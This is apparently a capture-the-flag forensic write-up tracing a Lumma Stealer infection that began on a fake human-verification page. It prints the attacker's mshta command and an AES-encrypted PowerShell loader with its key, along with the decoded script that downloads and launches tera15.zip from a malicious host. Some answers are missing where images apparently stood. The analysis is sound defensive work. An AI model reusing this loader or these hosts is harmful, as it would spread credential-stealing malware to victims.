Scenario

Lumma Stealer is a powerful malware written in C that secretly steals a wide range of data from infected systems. This MaaS (Malware-as-a-Service) tool has quickly become known for its ability to target and steal important information like cryptocurrency wallets, browser data, email credentials, financial details, personal files, and FTP client data. It uses advanced techniques like controlled data writing and encryption to avoid detection and increase its effectiveness. A new and sophisticated method of distributing Lumma Stealer malware has been uncovered, targeting Windows users through deceptive human verification pages.

You have been given a disk triage from a machine that has fallen victim to this new attack. Your task is to analyze the malware and determine exactly what occurred on the machine.

Objective

Analyze multi-stage malware behavior, decode obfuscated scripts, trace execution flow, and identify evasion, persistence, and exfiltration tactics using forensic tools.

Questions

1. The victim has been deceived into executing an encoded Powershell command on his device. What is this command in its decoded form?

• I first transformed the provided evtx logs to csv using EVTXCmd.exe
• I then opened the logs using TimeLineExplorer
• Then filtered on PowerShell logs, hence Event ID 400 and found:

I decoded the base64 using cyberchef and found:

mshta "https://clicktogo.click/uploads/tra15"

2. What is the MITRE ATT&CK sub-technique ID for the technique used by the malware sample to download and execute its payload through a trusted system utility in the previous PowerShell command?

Searching on google, we find “System Binary Proxy Execution: Mshta” and has T1218.005 as ID

3. The victim was tricked by a fake verification website while browsing the internet. What is the URL of the malicious website to which the PowerShell command belongs?

Analyzing Edge History Artefact located at:

C:\Users\Administrator\Desktop\Start Here\Artifacts\Users\Infern0o\AppData\Local\Microsoft\Edge\User Data\Default

We find the following suspicious URL:

https://check-robot.b-cdn.net/Done-Captcha.html

4. In the second-stage of the malware execution, it downloads an additional file. What is the name of this file?

In the Temp directory, I found tera15.zip

• Additionally, I found an encrypted PowerShell command that downloads it.
• Original PowerShell Command:

Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -ep Unrestricted -nop function llemiXA($iMYi){return -split ($iMYi -replace '..', '0x$& ')};$MeloNmjt = llemiXA('1EC0DD0BB73CA88CF5B0BD8263811B4B64E34C06A804D58C0D811D5C37129DB5FFAFF3FEB78DD5A8C99D9D7BA8C273BB91B1B75E06AB87A183EA7755CCABE7B6932D5F329F5305ACA6C3D7D808AC8765ECCC87F99F44C7296D2424100B42DF8C725C2951946060EA69ED332FE9E38A6EE3DBFE14005664EB807CD0D97E8066BAF32FB30305E9BCB1632DA3929F1A6D35F806B6ADA832BDD28C27DAC62E8048E082CC6076657EA67129E53CDD376F76BC7DD61EC02B7ABA914F3168EB1EC802A7D47907460C1BCB530B127B5FCABF6D0F9D323902BD023BB413216AD6E710BFEAE8D21715882AE9E8145DA4B7FF51E118407666DF27AF2374FDAC2F8086FEAE8FE51D21418E13D663E146D4EE51F5F66D45D68EC04D8BDBAC689AD4F09C3DD1889D47C47E909DA94FC6C3285BDB524410FC6F6E6F99D2BDCC82DF6D07CCDA6521E8ADAC7456B3212C7AAAC89D32FC8EC9FC0D4135BDBE19EB5FB37E391E633F1D5F9FCBF6BF94396BFDDB00A44C18EC929D97BAC9ADC3383B31DE685AC331D31AE6DE1803CE47C3989F203DE31546D749529FEE5B16CA01B5119C933223A1B21DE212CC321ABBD42CB8BF415900C9C0D5360406DE8CAEB2C91603FC7C299C270E67BEF0917E182D4D7001B7E4C5EBF710BC694C57E326F2783FF9150509431AB5845BD0B5A2FB07691DEE676D7FE0654BECB7AE175241E3AB495EC2D65D5FA126C5443E4E44B5F718C3F518D3E941E241D38BA855B06322364E61AC9182D5DD8987C5071A34732CE1F84365B97744A8C7A2831635E99E50D757B98A20C6197B58E622D1EC103C19D71DFA35AB4D021771DE08A5060B541FE76488C587576AD47238815B7FBEDF8844DE75EE77498A8FB1E5BDDB6EE2DF363851E223748EF1B17A596F8E039155ACC3BDA790ADDCBF1EE95768008B2D771A52CE8E589E9F41E7BA6474D9A49C0EE3265A11A92E9E877353A2EC2AA0CD2D8763F45633ABA0B37813EF274E4E88267E951079CA280E6AB2B7B5BD674929E47808B6B192871682FB41A2E73ED48375257811E5BC63B92DC423C8FB6712FCA16CA1A595A1BCB9327D94EBFA2B4C7F4AB78415731AD5812DB05B187FD30C3BFDA6647CE8154B7D6BA029C4FD0D39A343AABBB56A791659EC48C83E2CBE825B6CF31079E61E972368EB2F88EDECBB6AF363B82AE6C049BB8E07CBCC55522E2BAAEE50310A90229F69A91271804812F592BB8840D5C524D0920299C76866C9A35B890F3DA8B83F2433102A6354B210BD3435C758E4C313534EFF96A183DCBE2BA01EE36A17A46655FC56F67378ED2427E2EF703212103C10AC91E393047B31FEF5057EC3EE13AC675F0B526EB9037DFB8B3E8BD228FF0EB4822623');$kCqXc = [System.Security.Cryptography.Aes]::Create();$kCqXc.Key = llemiXA('53626368526B457A4E4F695244796C53');$kCqXc.IV = New-Object byte[] 16;$MAElvXve = $kCqXc.CreateDecryptor();$qWOgiQdIE = $MAElvXve.TransformFinalBlock($MeloNmjt, 0, $MeloNmjt.Length);$jGAqRnDYn = [System.Text.Encoding]::Utf8.GetString($qWOgiQdIE);$MAElvXve.Dispose();& $jGAqRnDYn.Substring(0,3) $jGAqRnDYn.Substring(3)

Decoded PowerShell Command:

$zip = Join-Path $env:TEMP 'tera15.zip'
$url = 'https://clicktogo.click/uploads/tera15.zip'

if (-not (Test-Path $zip)) {
    (New-Object Net.WebClient).DownloadFile($url, $zip)
}

Expand-Archive -Path $zip -DestinationPath $env:TEMP -Force
$first = Get-ChildItem -Path $env:TEMP | Select-Object -First 1
Start-Process (Join-Path $env:TEMP $first.Name)

5. What is the URL from which the above file was downloaded?

As found in the previous question after decoding the PowerShell Command:

https://clicktogo.click/uploads/tera15.zip

6. The malware performs process hollowing on a legitimate system process to evade detection. What is the name of this process?

I calculated the malware’s SHA256 using the following cmd command:

certutil -hashfile chkbkx.exe SHA256

I got the following result:

7c5b4be6d1d08fe5bc81f0ac5b3ec77f87f73b5a81eef0dd6f45255b22f08edd

I then checked the behavior on VirusTotal and found the injected legitimate process:

7. Monitoring the malware’s network activity can reveal the domains it intends to connect to. What is the first domain it attempts to connect to?

I calculated the malware’s SHA256 using the following cmd command:

certutil -hashfile chkbkx.exe SHA256

I got the following result:

7c5b4be6d1d08fe5bc81f0ac5b3ec77f87f73b5a81eef0dd6f45255b22f08edd

I then analyzed the malware on VirusTotal and got the domain: